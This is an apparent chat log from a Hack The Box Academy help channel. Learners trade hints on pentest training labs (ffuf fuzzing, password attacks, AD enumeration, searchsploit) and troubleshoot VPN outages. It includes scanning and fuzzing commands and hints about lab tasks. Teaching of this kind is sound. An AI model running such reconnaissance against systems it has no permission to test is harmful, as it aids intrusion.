what lists to use to guess the name and password at the beginning of the module? i am using top-usernames-shortlist.txt and rockyou-20.txt but something is taking too long! usually the rules say that the bust during training should not be longer than 30 minutes.

Anyone else doing AD Enumeration & Attacks Skills Assessment 2 and having an issue connecting to the attack host? I was connected, then lost connection, wouldn't let me connect back to that host so reset the target (a couple times) and reset pwnbox as well, it won't ping or connect to the generated target IP?

Anyone else connectivity issues with the Password Attacks module? (ps. I'm using the pwnbox as attacking machine)

They are currently having a vpn maintenance going on ... so that could be an issue

My dear moderators, and staff of HTB academy

For how long can we expect the maintenance work to go

So we take round off break and do other stuffs

anyone avaible to help me with the file upload > type filters?

@fathom bay your looking for the magic byte for a jpeg. begins with ÿ and ends with Û

Can I message you?

Can we be notified when the VPN is working?

sure

quick fuzzing question. i need to use this string from academy it says to remove some stuff from the list, but it doesn't seem to be doing that. i've compared file paths etc and it works so i'm not sure what i'm missing
sudo sed -i 's/^#.*$//g' /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt && sudo sed -i '/^$/d' /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt

that should remove any commented lines from the start of the text file.

providing that is where your actual Seclist folder resides. On my VM I do not have /opt/useful. My seclists is in /usr/share/wordlists/

yeah just double checked it. that filepath is fine and the document is definitely there

but i'm getting 87k checks which doesn't take forever but no results

I was getting RDP disconnects on a few sections last night, but switching to the US VPN fixed it

https://academy.hackthebox.com/module/115/section/1105 is not working to spawn any target machines that respond

does anybody else have this problem?

i've respawned it so many times already

always dont connect or ping

vpn maintenance is probably ongoing

Is this the part where we're removing the comments off?

Hey everyone, I haven't been paying attention when I complete modules, is there a way to see what, if any, boxes are recommended to hack after each module is completed?

PASSWORD ATTACKS
what lists to use to guess the name and password at the beginning of the module? i am using top-usernames-shortlist.txt and rockyou-20.txt but something is taking too long! usually the rules say that the bust during training should not be longer than 30 minutes.

Check the Resources at the top, they give you a zip file with wordlists to use

You can start each module and then click the Finish button again at the end. Then you should see the boxes of the respective module.

yeah it says fuzz the /blog directory. so i did extension fuzzing to confirm .php and now it's find hidden pages

@polar widget yeah like i dunno what i'm doing wrong. probably a random typo but i'm copy/pasting strings and double checking they're in the directories the lesson says they are

if anyone can help me troubleshoot i'd appreciate it

This is the most brilliant idea I've ever come up with! I didn't even see that link! Thank you!😆

np!

fun with ffuf

https://academy.hackthebox.com/module/39/section/414

Anyone who could guide me a little bit

hey guys im in last section of the attacking web apps with ffuf module

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://FUZZ.academy.htb:30556/

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.4.1-dev
________________________________________________

 :: Method           : GET
 :: URL              : https://FUZZ.academy.htb/
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

:: Progress: [4989/4989] :: Job [1/1] :: 956 req/sec :: Duration: [0:00:06] :: Errors: 4989 ::

for some reason, i get all errors when i simply try to find subdomains, what am i doign wrong?

no spoilers i'm on that now haha

i didnt spoil anything

i just finished the section i'm on . turns out ffuf really wants a full window otherwise it FREAKS out. did the exact same command i've been using but tried with a full window and it finally worked

i know just saying sometimes people will talk about things here instead of dm's

ok

Do a port scan. What ports do you find? Which applications are running on the ports?

yup did that already & checked for possible exploits on MSf

could you explain a bit more in dm @acoustic owl

====
Hello guys, I am stuck at this.

Any hints?

@rich mulch check what group the secaudit user is part of, then run a find command to find files part of that group

The flag is hidden in a log file 🙂

@unique valve Hey! I have the same problem. Can I DM you about Dynamic Port Forwarding with SSH and SOCKS Tunneling?

Sure! 🙂

is it in /var/log? I did read all file log in there, but found nothing

its in an ||apache log||

Hey All, AD Enumeration and Attacks Skills Assessment 2 - I'm stuck on the "Locate a config file contaiing a MSSQL connection string" task. Any help or push in the right direction on where to locate that config file?

awww, I did read this file but not carefully = =!

@timber tide Try using ||snaffler.exe|| 🙂

Thanks, will give it a try

Any help with: Web Attacks -- Bypassing Security Filters -- Second Question | Am I supposed to use the reset.php for this? It just keeps deleting everything and giving me the same flag I got from first part

@tiny ledge try making a POST to index.php

You mean /admin/index.php or just IP:PORT/index.php

EDIT: Tried again and it worked, thanks! Got the flag

Module pivoting, tunneling and port forwarding: section meterpreter tunneling and port forwarding: I can't execute any meterpreter payload on the ubuntu target. I've tried x64, x86, meterpreter_reverse_tcp, meterpreter/reverse_tcp, etc, but all I get when executing it is Segmentation fault (Core dumped) The msf handler catch the session, but it instantly closes.

thank you!

@sweet heron if you're getting a seg fault, on the machine catching the shell, it's buggy, its overwriting the wrong memory space. Is Msf up to date?

I'll try updating, but should be. It segment fault on the target, not my host.

Did anyone find the MySQL credentials for the Password Attacks - Password Reuse / Default Passwords? I found the answer but it was not on the target. Used a resource listed in the sections reading and was wondering if that was intended or not.

I believe that's intended

Hola

hi how are you

OK, I'm having issues. My VPN connection doesn't work after an update of my kali VM. It connects ok, I've got the same usual IP, but can't ssh any target. Also, usually I'm able to go on the internet with the VPN on, but not anymore (i know about default route). I've tried fresh VPN file, same problem. Any server down ?

Have you tried alternating between US and EU vpn keys?

Try changing 'cipher AES-128-CBC' in your .ovpn file to 'data-ciphers AES-128-CBC'

already corrected.

I can't even connect to EU, it times out. It looks like the update change something, but I've got no idea how to find the problem...

Main platform VPNs time out too. Did the update broke openvpn (reinstall doesn't help) or broke some config (but which?)? I'm on kali 5.18.5-1 in a VM.

whats your openvpn version?

2.6.0

try rolling back to 2.5.5

just tested mine, 2.5.5 works fine

It's actually 2.6_git for some reason.

? did you clone and make from github?

not at all.

ya try rolling it back, or a different repo

yo
need help on the Active Directory Enumeration & Attacks
with this question... the other questions was kinda easy but this makes no sense

"What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)"

@sweet heron well looks like mine is broken now too, I just updated my ubuntu, now im getting openvpn errors

could it be due to the vpn maintenance HTB was running yesterday?

@iron plaza that's likely. Anyone else having vpn issues?

a lot of people complained yesterday and I saw the maintenance banner on the site

ahaa

Damn... And I can't seem to install openvpn from the tarball. Getting missing elements (lzo, PAM). Guess I'll try again tomorrow.

well looks like another day of break I guess

ya definitely is a problem on HTB side, it's showing incorrect vpn status

heck even the pwnboxes in the academy modules are not working ... mine is still saying "instance is starting..." for the past 5 min

ya, the instances aren't working either, so looks like all of it is having networking issues

is there a mod or HTB staff that can notify us when the VPN issue is resolved?

Dunno, I don't see any update on twitter, and I don't see one on the regular page or academy page

seems vpn is working guys

they did something different, but it's still not establishing a connection for me

i connected to the EU server

maybe the us servers are down

or the vips

probably

vip eu is still down for me

most likely they are making the rounds for all levels of vpn

think this has anything to do with the ubuntu 22 dist upgrade today?

if their openvpn servers run ubuntu that might be why

i am running kali and did an upgrade yesterday and faced the same issue so it is mostly an openvpn config on HTB's side

if it takes longer than tonight i hope they shoot us an update

i started to think some giga chad hacked the entire platform as oppose to the pwn boxes

I mean it's probably possible, and I'm sure they'd love someone to test it to point out possible bugs or security issues

Can someone please help me with the flag5 SQLMAP Essential modules?

@iron plaza is your eu connection really working?

yes i am on it right now try to finish some unsolved questions

mind you i am using the 2.6_git version of openvpn

so maybe their openvpn server updates are kicking back 2.5.5 client connections

someone else earlier was using 2.6git and had similar connection issues

yea saw the message, and i was using 2.5.6 and had no connection. But when i reinstalled openvpn i got the 2.6_git version

did you install through apt?

yes

I removed and reinstalled and with apt-get and got that aforementioned version

hm, i did a reinstall a couple hours ago and it gave me 2.5.5 again

do apt and apt-get have seperate repos?

@coral heath sry mate not ignoring you, having connection issues

they use the same source

@iron plaza thought it did. just did apt-get, still got 2.5.5

Repositories are defined in /etc/apt/sources.list so perhaps ubuntu didnt roll it out?

im so confused, openvpn's latest build is 2.5.7

I have a bad feeling that this is going to be an issue for just me

i just checked the site and yea 2.5.7 is the latest ... so where the hell did i get 2.6 from

maybe they rolled it out on apt before they updated their page, but weirdly their github doesn't seem like it updated to 2.6 either

not sure why sqlmap essential modules I found flag5 tables but it keeps saying unable to retrieve the number of columns

2.6 is referenced on their community page as "next up"

oh, weird so looks like it's dying after trying to add IPv6 to tun0, 'permission denied', did my ipv6 permissions reset with the dist?

oh wouldnt be able to say

@iron plaza Hallelujah!

it was my upgrade, I guess it disables the /proc/ settings to =1 by standard

was that it ... the ipv6 permission?

@iron plaza Yup that was it. A similar issue in 2020 in the HTB forums showed the correct enable method

why do i feel like this was a needle in the haystack moment

lol right? @iron plaza I appreciate the help, I would've just sat and waited like a chump without your help

i highly doubt i helped at all

lol, helped enough. We narrowed it down to an issue on my end

that solution though was something so difficult to come up with considering the problem was not usual

yup, lots of changes today. If someone comes around later, they can "cat /proc/sys/net/ipv6/conf/all/disable_ipv6 ", and if it shows "1", they just need to "$ sudo sysctl net.ipv6.conf.all.disable_ipv6=0" to fix it

i'm sure I'm not the only one using ubuntu

hey guys im in last section of the attacking web apps with ffuf module

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://FUZZ.academy.htb:30556/

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.4.1-dev
________________________________________________

 :: Method           : GET
 :: URL              : https://FUZZ.academy.htb/
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

:: Progress: [4989/4989] :: Job [1/1] :: 956 req/sec :: Duration: [0:00:06] :: Errors: 4989 ::

for some reason, i get all errors when i simply try to find subdomains, what am i doign wrong?

@pliant summit I'm trying it now, getting errors too

oh , is there something wrong with the module?

dunno, i'm gonna pop into the mod real quick and check

oh wait did you add the machine to your /etc/hosts?

it won't scan ".academy.htb" correctly if it doesn't route properly

Yea I did

@pliant summit dunno, getting the same issues here

the machine is up

Yea, idk maybe we can ping the creator of the module?

hey can anyone help with the Skills Assessment - Using Web Proxies

cant seem to enable the button.

ive tried intercepting the response and altering the post form data but i cant seem to get the button to work.

@pliant summit I gotchu bud

for a vhost enumeration you need to set the -H to alter the headers sent

so you're not fuzzing with -u "http://FUZZ.wahtever.htb"

you'll use -H "HOST: FUZZ" -u http://academy.htb:<port>

you'll get a whole bunch, so you'll have to filter by size or words or lines to find the right subs

@rustic sage I'll see if i can help

thank you

i just got it thank you!

@rustic sage good deal, lol I wasn't fast enough

no worries i feel kinda dumb for asking lol

@rustic sage lol np

Can anyone assist with broken Authentication : Predictable Reset Token? I have created the script and using it but it doesn't seem to be working correctly..I am unsure

Oh thanks bro, gonna try once I’m home

DM me

@lethal atlas I think I might have gotten it but ty! Sorry!

np

is there an issue with vpn again?

lemme check

i connected to the box but when i ping the ip it shows 100% packet loss

thanks

yeah i get dummy packet loss too

i restarted the vpn session and machine ... still the same thing, I connect to the vpn but the target machine ip when pinged gives me 100% packet loss

whats the solution, wait it out?

idk lmao

Hi, I am working on FILE UPLOAD ATTACKS- Limited File Uploads. And I really need help in that. I have no idea where to start. I have done all the previous ones and knows them well. Thanks for any help.

File uploads?

Can anyone nudge me on Cross-Site Scripting skills assessment?

how long does it usually take for someone to finish the junior pentester path from start to finish?

For each module, an approximate time is given as to how long it will take to complete.

ok, would i be able to start doing htb boxes after doing the path you think?

Yes, provided you really understood the content, you are guaranteed to be able to solve HTB boxes afterwards.

Feel free to DM me

module 77 section 843 (Getting Started, Public Exploits)

Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file.

searchsploit http://x.x.x.x:y/
[*] exec: searchsploit http://x.x.x.x:y/

Exploits: No Results
Shellcodes: No Results

in msfconsole^^^

searchsploit searches exploitdb

So you'd do

searchsploit wordpress

Not the IP

Search the names of services running on the server

it fucking doesn't work

it shows a ton of names and other things

and when I accessed the ip+port in the browser

I didn't get a domain

simply the ip and the port

Oh dear, this one was nasty
I too tried just everything, enabling something while disabling something else, manually inserting those tags and such,
It just doesn't work that way,

We gotta ||remove|| something

86 epxloits

using search exploit wordpress

You need to Try to identify the services running on the server

which WP modules can you find? anything else of interest?

...

I don't understand

how am I supposed to identify the services

nmap scan?

Yes

Wordpress is like Windows; it's a system where you can run many plugins and other code inside it

some of those plugins might be old

also that

the nmap takes a while

nmap -Pn -sC -sV 206.189.25.173

idk what to do

hello

hello

im a begginner

good

#bot-commands

and use ++verify

can u tell were to start

https://app.hackthebox.com/

Then https://academy.hackthebox.com/

ok

thanks

what is a WP module first of all

WordPress module

it's an addition to the website, created by potentially somebody else

ctrl+u?

e.g. a webshop or a feedback button

like hyperlinks?

no

i fucking hate exploits

2hrs now

wordpress is a Content Management System, i.e. a system that translates your input content in to a website - like a blog, where you don't need to upload HTML to add a new page, but just click "create new blog post" and WordPress does the rest

okay

WP also allows you to install modules or plugins. These are components made by WP or by other people

wp is an acronym for wordpress

So where WordPress might help you build a blog out of the box without anything else installed, it won't help you build a webshop

yes

right?

good

now how do I identify the wp modules

There's a few ways, but I don't know if they are the intended ways for you right here and now

@high zinc pls tell me how to start

then how am I supposed to pass the test

There's a whole Academy Module (course) about hacking wordpress, so I'm thinking what you're looking for is much less complicated

#613049811481919508

ok thanks

but I need to go past this section

I am simply stuck here and afterall I need to get the content of the /flag.txt

if I would've known the website domain so I can use searchsploit

searchsploit doesn't search websites, it searches for product names like "Microsoft Word" or "Discord"

ok for this particular test @pallid breach what you gotta do is open the website and read

A large part of hacking is not to run tools and push buttons, it's reading and analysing what you are presented with

just a small issue i've on first Privilege Escalation

question number2 said when you gain access to user2 try to escalete root privileges

i've found the id_rsa and id_rsa with wrong permission so i've copied both files, i've tried to ssh to local 80 port where ssh daemon is running but when i'm trying to connect to this service

Load key "/home/user2/id_rsa.pub": invalid format

md5sum is the same 😦

then I should use searchsploit Getting Started

but i don't know how the product name

Try to figure out what searchsploit does first

i've tried to generate new pubkey with ssh-keygen -f id_rsa -y >id_rsa.pub

binvalid format 😦

someone could dm me for help 😦

"Then, we can use searchsploit to search for a specific application by its name..."

OK, so you're looking for the name of an application

searchsploit is more or less a fresh copy of https://www.exploit-db.com/

hi there fellas

i am having trouble with an exercise from the hashcat module

the exercise on page 'hybrid mode'

ive been using the given mask as a suffix and a prefix and trying each hash type that comes up in hashid

but it doesn't find anything

i let it go for about 2 minutes, the hint says it should take 90 seconds

i feel like i am doing something wrong

I searched it on youtube

and still doesn't work

I am sick of this

DM
We'll figure it out

I stuck on it as well. The webserver is too slow and unstable. Restart so many times and still cant get a stable shell. no matter reverse or other pivots

Hey 🙂
anyone know what is looking for with that the only one I'm missing. From the module Intro to analyze network traffic.

What addressing mechanism is used at the link layer of the TCP/IP model?

SMB 10.129.202.136 445 WINSRV CASSIE READ,WRITE

empty file Flag.txt?

password attacks

why?

where is the mistake 😦 Load key "id_rsa": error in libcrypto

i'm stucked :(((((((((

ok done sry 🙂

anybody know?

flag.txt 0 Kb

in smb flag.txt is 16kb

should be not transfert good

if prit flag.txt - Error opening local file flag.txt

if get flag.txt - 0 Kb

hey guys , i am stuck @https://academy.hackthebox.com/module/20/section/113 hashcat module cracking common hashes, i tried all possible hash types with rockyou.txt and up to 10000 random rules , no luck

i tried md5,md4,NTLM

Can someone explain how Tornado payloads work for server side injection module? I cant get tplmap to compile correctly using HTB's steps and. When I curl using the example payload it doesn't get an error but it doesn't work either (same as what's shown in the payload)

Need some help with Command Injection - Skills assessment. Just can't get that thing to work. Found the injection point but i can't really seem to successfully inject anything really even though i belive i am bypassing the filters correctly. Would be grateful for some helps 😩

DM me

I had issues compiling when I placed in the /opt but when I put it in a folder I had write permission on it worked fine.

DM me and I can look at your command.

🤔 I will definitely try that, thanks!

yo
need help on the Active Directory Enumeration & Attacks
with this question... the other questions was kinda easy but this makes no sense

"What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)"

curl

ops sorry wrong search :))

DM

Try to change the directory where you dowload the file

Currently working the "initial enumeration of the domain" section of the active directory enumeration & attacks module, but when attempting to run wireshark like the lesson documents, I get this:

Unable to run wireshark as sudo as well. This is while connected to the student mention via xfreerdp as the lessons mentions

anyone available to help me with the ffuf skills assessment?

@quiet prism what's the problem?

i've got the sub-domains and extensions

they're in my /etc/hosts file

am i just running a recursive scan and filtering out 403 errors?

it says pages, have you tried visiting in a browser?

oh wait i see, ya so after doing the extension identification, do a normal recursive, ya

ya you got it

if you saw the hint don't get confused, the "use :PORT" is just for your answer, as the port per instance always changes

yeah the hint threw me ok. so i've got 3 sub-domains, so 3 recursive scans yeah?

yup

by adding the sub-domains to etc/hosts doesn't it automatically scan them?

no, if i remember right you can specify an option to scan multiple subs

it will go through one sub, then the other, etc. It'll take a while too

eugh 😢 i flew through this not sure why the skills assesment is suddenly giving me problems. doesn't help pwnbox keeps dropping connection so i have to go and update /etc/hosts xD

ya apparently since update theres been connection issues. It might be worth spooling up parrot or kali on a vm just to do this challenge, so you won't drop connection

Btw, anyone know where I'm supposed to put questions related to regular boxes or challenges? the #welcome says ask in HTB:Platform but I don't see it in the channel list

So HTB:Platform is a category, which holds the different chatrooms for challenges, boxes, battlegrounds, etc

It should be right below HTB:Academy and above HTB:Multi-Machine Labs

Huh, ya not here

neither is HTB:Multi-Machine Labs

HTB: community help

academy

business ctf 2022

offtopic / serious discussion

hmm, only other thing i can think of, did you verify your htb account?

I think so, pretty sure I did, thought I had to to chat

Hmm, might need to enlist a mod for that one

Do i just dm one? I've not bothered em before

yeah i've got a vm i'm comfortable with it's just so easy to open up a pwnbox xD

forgot to remove commented text from file zzz

@quiet prism aha, good deal. Ya pwnbox is nice

how is this NOT the right url

@quiet prism how far did you recurse?

1

think i need to go to 2

hey can anyone give me some help with fuzzing a cookie? im having some issues determining where to place the payload.

@rustic sage Which module are you on, and which section?

Skills Assessment - Using Web Proxies

OK

@quiet prism you're on the right track

@high zinc lol, what was that about?

dunno

spammed asking to get banned so I granted their wish 😄

@high zinc😆

yeah feels like it. just would be nice if i could be bothered to ignore the code 200 and 300 stuff. i only need the 403s i think xD

@quiet prism you can set the -fc to ignore multiple status codes

yeah i'm actually reading the help page while the scan runs. almost done now xD\

@rustic sage Oh I know where you're at. You need to tack on an alphanumeric at the end of this md5 hash, then decode, rinse and repeat

You can script something or just do it manually

@quiet prism nice 👍 Ya I really liked that mod, I learned a bunch about ffuf, and its good the tool is extremely intuitive and easy to use

yeah tbh really enjoying. i've completely become obsessed with this cyber security stuff the last month

@rustic sage btw, I remember that specific challenge, but I don't remember what specific module or section that is, if you're having trouble remember to let people know where exactly you're at so they can look into it and help

@quiet prism good, stick with it, it only gets more rewarding and fun!

its the using web proxies module

career change incoming haha

so ive decode the cookie to the 31 char. it said to, ive sent it to intruder and place the payload here ive tired multiple locations and cant seem to figure this one out. when i click start ig get nothing but ok 200 responses . am i putting the payload in the wrong position?